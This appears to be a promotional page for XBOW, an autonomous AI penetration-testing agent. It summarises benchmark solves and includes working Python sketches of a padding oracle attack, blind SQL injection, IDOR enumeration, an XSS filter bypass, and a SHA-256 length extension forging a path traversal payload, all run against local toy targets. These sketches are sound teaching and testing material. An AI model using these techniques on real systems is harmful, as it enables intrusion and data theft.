
Boosting offensive security with AI
XBOW autonomously finds and exploits vulnerabilities in 75% of web benchmarks
PortSwigger Labs
PentesterLab Exercises
Novel Benchmarks
See XBOW at work
XBOW pursues high-level goals by executing commands and reviewing their output, without any human intervention.
These are real examples of XBOW solving benchmarks. The only guidance provided to XBOW, aside from general instructions that are identical for every task, is the benchmark description. If you'd like to see all the data, click here.
Breaking a Cryptographic CAPTCHA with a CBC Padding Oracle
Don't roll your own crypto, or XBOW might break it. This trace shows XBOW pulling off a classic Padding Oracle attack on an AES-CBC implementation in the novel XBOW benchmark "Bad Captcha". By manipulating the authentication cookie used by the app, XBOW is able to decrypt the secret one byte at a time and use it to register a new user.
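To make the byte-at-a-time idea concrete, here is a minimal sketch of a CBC padding oracle attack. It is not XBOW's code and not the benchmark's server: the Feistel cipher is a toy stand-in for AES (the Python standard library has none), and every name here (`padding_oracle`, `recover_block`, the sample secret) is an assumption made for illustration. The attack logic itself does not depend on which block cipher sits underneath.

```python
import hashlib
import os

BLOCK = 16

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key: bytes, i: int, half: bytes) -> bytes:
    # Feistel round function: keyed hash truncated to half a block.
    return hashlib.sha256(key + bytes([i]) + half).digest()[:BLOCK // 2]

def encrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for i in range(4):
        left, right = right, _xor(left, _round(key, i, right))
    return left + right

def decrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for i in reversed(range(4)):
        left, right = _xor(right, _round(key, i, left)), left
    return left + right

def cbc_encrypt(key: bytes, plaintext: bytes) -> bytes:
    n = BLOCK - len(plaintext) % BLOCK
    padded = plaintext + bytes([n]) * n          # PKCS#7 padding
    prev = os.urandom(BLOCK)                     # random IV
    out = [prev]
    for i in range(0, len(padded), BLOCK):
        prev = encrypt_block(key, _xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def padding_oracle(key: bytes, data: bytes) -> bool:
    # Server side: decrypts and leaks only whether the padding is valid.
    last = _xor(decrypt_block(key, data[-BLOCK:]), data[-2 * BLOCK:-BLOCK])
    n = last[-1]
    return 1 <= n <= BLOCK and last.endswith(bytes([n]) * n)

def recover_block(oracle, prev: bytes, target: bytes) -> bytes:
    inter = bytearray(BLOCK)                     # will hold D(target)
    for pos in range(BLOCK - 1, -1, -1):
        padv = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ padv          # force known tail to padv
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1:
                # Rule out accidental longer paddings such as 02 02.
                forged[pos - 1] ^= 1
                still_valid = oracle(bytes(forged) + target)
                forged[pos - 1] ^= 1
                if not still_valid:
                    continue
            inter[pos] = guess ^ padv
            break
        else:
            raise RuntimeError("oracle never accepted a guess")
    return _xor(bytes(inter), prev)

def attack(oracle, ciphertext: bytes) -> bytes:
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(recover_block(oracle, blocks[i - 1], blocks[i])
                     for i in range(1, len(blocks)))
    return plain[:-plain[-1]]                    # strip the padding

key = os.urandom(16)                             # known only to the "server"
secret = b"captcha=7XK9QZ;user=guest"            # hypothetical cookie content
token = cbc_encrypt(key, secret)

def oracle(data: bytes) -> bool:
    return padding_oracle(key, data)

recovered = attack(oracle, token)
```

The attacker code only ever calls `oracle`; it never touches `key`. Each plaintext byte costs at most 256 oracle queries, which is why the secret falls one byte at a time.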
Exploiting Insecure Direct Object Reference (IDOR) in a GraphQL API
Even when we entirely removed the benchmark description provided by its author, XBOW still solved this novel benchmark. From nothing but a login page, it guesses a valid username and password, analyzes the code of the prescription management app, and uses GraphQL introspection queries to view the prescriptions of all users on the site, finding one that holds the flag.
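The core of an IDOR is a lookup that trusts a client-supplied identifier without checking it against the logged-in user. The sketch below simulates that in memory, with no GraphQL server involved; the data, the resolver names, and the flag value are all hypothetical and are not taken from the benchmark.

```python
# Hypothetical data store: user id -> prescriptions.
PRESCRIPTIONS = {
    1: ["ibuprofen 200mg"],
    2: ["amoxicillin 500mg"],
    3: ["FLAG{example-only}"],
}

def resolve_vulnerable(session_user_id: int, requested_user_id: int) -> list:
    # BUG: the session user is ignored, so any id can be requested.
    return PRESCRIPTIONS.get(requested_user_id, [])

def resolve_fixed(session_user_id: int, requested_user_id: int) -> list:
    # Fix: enforce ownership before returning the object.
    if session_user_id != requested_user_id:
        raise PermissionError("not your prescriptions")
    return PRESCRIPTIONS.get(requested_user_id, [])

def enumerate_ids(resolver, session_user_id: int, candidates) -> dict:
    """Try every candidate id while logged in as session_user_id."""
    found = {}
    for uid in candidates:
        try:
            rows = resolver(session_user_id, uid)
        except PermissionError:
            continue
        if rows:
            found[uid] = rows
    return found

leaked = enumerate_ids(resolve_vulnerable, 1, range(1, 10))
allowed = enumerate_ids(resolve_fixed, 1, range(1, 10))
```

Against the vulnerable resolver, user 1 reads every record, including the one holding the flag; against the fixed one, only their own.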
Debugging, Testing, and Refining a Jenkins Remote Code Execution Exploit
After a benchmark bug made this "Medium" difficulty PentesterLab exercise much more difficult than intended, XBOW beats the odds by debugging not only its own code but the compromised server as well. Its final solution, a Python program that exploits XML deserialization to deploy an embedded bash script that steals secrets from running processes' command lines, is a thing of beauty.
Researching and Implementing an Exploit for a node-jose Vulnerability
Faced with the task of exploiting CVE-2018-0114 in node-jose, XBOW combs through reams of GitHub issues and then uses what it learns to craft a custom proof-of-concept exploit to solve an exercise from PentesterLab rated "Hard".
Leveraging Weak Credentials to Exploit SSTI Vulnerabilities
After brute-forcing its way through the login system, XBOW explores the web app's internals and uncovers a Server-Side Template Injection (SSTI) vulnerability that allows executing arbitrary code remotely. As it proceeds, its payloads grow fearsomely complex, but its final solution to this novel XBOW benchmark is simple and elegant.
Exploiting Blind SQL Injection from Scratch
XBOW can use existing tools, but it also understands the fundamentals. In this trace, it solves a "Practitioner"-level PortSwigger Blind SQL Injection lab without using sqlmap. Instead, it identifies a difference in how the server responds to different malformed SQL queries, and then exploits that difference to leak out the admin password one character at a time.
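The character-by-character leak can be sketched as follows. This is an illustration under assumptions, not the lab or XBOW's exploit: it uses an in-memory SQLite database, a hypothetical `page_loads` function standing in for the HTTP response difference, and made-up table names and password. The only signal the attacker code sees is a single boolean per request.

```python
import sqlite3
import string

# Hypothetical vulnerable backend.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('administrator', 's3cr3tpw')")
db.execute("CREATE TABLE tracking (id TEXT)")
db.execute("INSERT INTO tracking VALUES ('abc123')")

def page_loads(tracking_id: str) -> bool:
    # Vulnerable: user input is concatenated into the SQL string.
    query = f"SELECT id FROM tracking WHERE id = '{tracking_id}'"
    try:
        return bool(db.execute(query).fetchall())
    except sqlite3.Error:
        return False  # an SQL error looks like a failed page load

ALPHABET = string.ascii_letters + string.digits

def char_at(position: int):
    """Return the password character at a 1-based position, or None."""
    for ch in ALPHABET:
        payload = (
            "abc123' AND (SELECT substr(password, "
            f"{position}, 1) FROM users "
            f"WHERE username = 'administrator') = '{ch}"
        )
        if page_loads(payload):
            return ch
    return None

def extract_password(max_len: int = 64) -> str:
    chars = []
    for position in range(1, max_len + 1):
        ch = char_at(position)
        if ch is None:      # no character matched: end of the password
            break
        chars.append(ch)
    return "".join(chars)

recovered = extract_password()
```

The payload leaves its final quote open so that the quote already present in the query closes it. A linear scan over the alphabet keeps the sketch short; a binary search on character codes would need fewer requests.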
Subverting Java Deserialization with Apache Commons
Despite facing a litany of technical challenges brought on by Java version incompatibilities, XBOW solves a "Practitioner"-level PortSwigger lab by subverting Java's mechanism for reconstructing an object from a sequence of bytes to execute arbitrary code when the unsuspecting application deserializes untrusted data.
Bypassing Filters and Exploiting Complex Cross-Site Scripting (XSS)
In this novel XBOW benchmark, XBOW detects one of the OWASP Top 10 most common vulnerabilities: Cross-Site Scripting (XSS). By hacking its way through a thicket of security filters, XBOW is able to find a bypass and exploit the XSS by using HTML entity encoding.
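Why entity encoding can slip past a filter is easiest to see with a toy example. The blocklist and function names below are assumptions, not the benchmark's actual filters. The sketch relies on one real behavior: browsers decode character references inside attribute values, which `html.unescape` imitates here.

```python
import html

# Hypothetical blocklist applied to the raw request value.
BLOCKLIST = ("javascript:", "alert(", "<script")

def naive_filter(value: str) -> bool:
    """Return True if the value is allowed through."""
    lowered = value.lower()
    return not any(bad in lowered for bad in BLOCKLIST)

def strict_filter(value: str) -> bool:
    """Decode character references first, then apply the same check."""
    return naive_filter(html.unescape(value))

def entity_encode(text: str) -> str:
    # Encode every character as a decimal character reference.
    return "".join(f"&#{ord(ch)};" for ch in text)

payload = "javascript:alert(1)"
encoded = entity_encode(payload)

# What the browser would see in an attribute such as href="...".
seen_by_browser = html.unescape(encoded)
```

The raw payload is blocked, the encoded form passes `naive_filter`, and the browser-side view is the original payload again. Checking after decoding, as `strict_filter` does, closes this particular gap, although output encoding is generally a more robust defense than blocklists.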
Writing a Customized SHA-256 Implementation for a Hash Length Extension Attack
To solve this PentesterLab "Hard" exercise (completed by only 649 human users on the site), XBOW writes its own implementation of SHA-256 from scratch and uses it to build a directory traversal payload with a forged signature using a hash extension attack, all without access to the tutorial given to human solvers.
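A custom SHA-256 is needed because the attack must resume hashing from a known digest, which standard library APIs do not allow. The following is a minimal sketch of that idea, not XBOW's implementation: the secret, message, and suffix are hypothetical, and the signature scheme is assumed to be `SHA-256(secret || message)`. The round constants are derived from prime roots, as the standard defines them, rather than typed in.

```python
import hashlib
import math
import struct

M = 0xFFFFFFFF

def _primes(n):
    found, c = [], 2
    while len(found) < n:
        if all(c % p for p in found):
            found.append(c)
        c += 1
    return found

def _icbrt(n):
    # Integer cube root by binary search.
    lo, hi = 0, 1 << (n.bit_length() // 3 + 2)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        lo, hi = (mid, hi) if mid ** 3 <= n else (lo, mid - 1)
    return lo

P = _primes(64)
K = [_icbrt(p << 96) & M for p in P]             # frac(cbrt(p)) * 2^32
H0 = [math.isqrt(p << 64) & M for p in P[:8]]    # frac(sqrt(p)) * 2^32

def _rotr(x, n):
    return ((x >> n) | (x << (32 - n))) & M

def compress(state, block):
    w = list(struct.unpack(">16I", block))
    for i in range(16, 64):
        s0 = _rotr(w[i - 15], 7) ^ _rotr(w[i - 15], 18) ^ (w[i - 15] >> 3)
        s1 = _rotr(w[i - 2], 17) ^ _rotr(w[i - 2], 19) ^ (w[i - 2] >> 10)
        w.append((w[i - 16] + s0 + w[i - 7] + s1) & M)
    a, b, c, d, e, f, g, h = state
    for i in range(64):
        t1 = (h + (_rotr(e, 6) ^ _rotr(e, 11) ^ _rotr(e, 25))
              + ((e & f) ^ (~e & g)) + K[i] + w[i]) & M
        t2 = ((_rotr(a, 2) ^ _rotr(a, 13) ^ _rotr(a, 22))
              + ((a & b) ^ (a & c) ^ (b & c))) & M
        a, b, c, d, e, f, g, h = (t1 + t2) & M, a, b, c, (d + t1) & M, e, f, g
    return [(x + y) & M for x, y in zip(state, (a, b, c, d, e, f, g, h))]

def md_padding(total_len):
    # 0x80, zero fill, then the bit length as a 64-bit big-endian integer.
    return b"\x80" + b"\x00" * ((55 - total_len) % 64) + struct.pack(">Q", total_len * 8)

def sha256(data, state=None, prior_len=0):
    """Hash data, optionally resuming from state after prior_len bytes."""
    state = list(state or H0)
    data += md_padding(prior_len + len(data))
    for i in range(0, len(data), 64):
        state = compress(state, data[i:i + 64])
    return struct.pack(">8I", *state)

def extend(mac_hex, known_msg, secret_len, suffix):
    """Forge a MAC for known_msg + glue + suffix without the secret."""
    glue = md_padding(secret_len + len(known_msg))
    state = struct.unpack(">8I", bytes.fromhex(mac_hex))
    prior = secret_len + len(known_msg) + len(glue)
    return known_msg + glue + suffix, sha256(suffix, state, prior).hex()

secret = b"server-side-secret"       # hypothetical; attacker knows only its length
msg = b"file=report.pdf"
mac = hashlib.sha256(secret + msg).hexdigest()
forged_msg, forged_mac = extend(mac, msg, len(secret), b"/../../etc/passwd")
```

The forged message contains the original padding bytes in the middle, so the target application has to tolerate them for the attack to be useful. In practice the secret length is usually unknown and is found by trying each plausible value.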
Team
Security, AI, and Engineering

Oege de Moor
Founder and CEO

Nico Waisman
Head of Security

Albert Ziegler
Head of AI

Andrew Rice
Head of Engineering

Aqeel Siddiqui
Head of Operations

Alex Gatzlaff
Account Executive

Alvaro Muñoz
Security Researcher

Brendan Coll
Research Engineer

Brendan Dolan-Gavitt
AI Researcher

Daniel Wagner
Research Engineer

Diego Jurado
Security Researcher

Ewan Mellor
Research Engineer

Fernando Russ
Research Engineer

Ian Campbell
Research Engineer

Javier Gil
Security Researcher

Joanna Clifton
Operations

Joel Noguera
Security Researcher

Johan Rosenkilde
AI Researcher

Jordan McTaggart
Finance and Operations

Max Schaefer
AI Researcher

Meurig Thomas
Research Engineer

Nicolas Trippar
Security Researcher

Thomas Bolton
AI Researcher

Blog
Updates and opinions from the team
December 20, 2024 - By Nico Waisman
The Nightmare Before Christmas: An arbitrary file download on Zoo-Project
XBOW discovered an arbitrary file download vulnerability on the WPS open source app Zoo-Project.
December 13, 2024 - By Diego Jurado
Stored Cross-Site Scripting (XSS) in 2FAuth
XBOW discovered a Cross-Site Scripting (XSS) vulnerability in the open-source project, 2FAuth.
December 2, 2024 - By Diego Jurado
LabsAI’s EDDI project path traversal
XBOW discovered a Path Traversal vulnerability in the open-source project, LabsAI’s EDDI.
Frequently asked questions
Benchmarks
What do you consider a “benchmark”?
A benchmark is a realistic exercise in web security, with a crisp success criterion like capturing a flag. Many challenges in CTF contests do not qualify because they are brainteasers rather than reflecting a realistic web security scenario.
Where did XBOW get its collection of benchmarks?
XBOW’s benchmarks have been carefully selected for relevance and breadth by its security experts. Sources include leading vendors of training materials, such as PortSwigger and PentesterLab, and public CTF competitions. Some benchmarks have been authored specifically for XBOW, so we can be sure they do not occur in any training sets.
The original PortSwigger labs do not have flags — why do the traces shown for these benchmarks include a flag?
The PortSwigger labs detect automatically whether you have solved the lab or not. However, we wanted all benchmarks to have the same crisp success criterion, one that can be checked by our infrastructure. So we introduced a flag and a mechanism for returning it.
Could you provide more information about the novel XBOW benchmarks?
XBOW’s security experts designed a set of unique web benchmarks to ensure that solutions were never included in any training data. The benchmarks cover many vulnerability classes and varying degrees of difficulty.
Will the novel XBOW benchmarks be released?
Yes. The novel XBOW benchmarks will be open-sourced soon. We hope others will join us in using these benchmarks to set a new standard for the evaluation of security tools.
How many benchmarks does XBOW have?
XBOW has collected a corpus of thousands of benchmarks, both for evaluating performance and for improving it.
Where can I find more details about the benchmarks that XBOW solved?
We provide more details to back up the results reported on this website. See here for the benchmarks that were attempted and which of them were solved.
Technology
How does the AI inside XBOW work?
It is an example of ‘agentic AI’. We use many standard techniques, but also plenty of proprietary innovations. Aside from general guidance that is identical for every task, the only directions given to XBOW are the basic benchmark description.
We are a growing startup and this intellectual property is our main asset, so we cannot share the details.
Are the example traces shown edited?
The AI reasoning and command outputs shown in our example traces have not been edited in any way (e.g., wrapped lines are still present). We have withheld the general guidance (“prompts”) to protect XBOW’s proprietary technology.
Can XBOW find and exploit vulnerabilities without providing descriptions or without having “flags” as a goal?
Yes, we have run experiments by blanking out the descriptions and that works fine. Without flags as a goal, XBOW decides on its own when it has finished. You can prompt it to be more or less aggressive - for example, when it discovers a SQL injection, it can (after approval from a human operator) continue to exfiltrate valuable data from the database, or just stop and report the core problem.
Is XBOW useful for everyone or does it require any sort of specific knowledge?
XBOW is useful for anyone looking to improve the security of their web applications. You don’t need to be a security or AI expert to use it: a lot of deep security knowledge is baked into the XBOW product. This is the magic of our team, which combines security expertise with AI and engineering skills.
Responsible AI
How will you ensure your technology won't be misused?
We will only make our technology available to trusted customers in the cloud. It is not possible to run XBOW as a standalone application outside our control.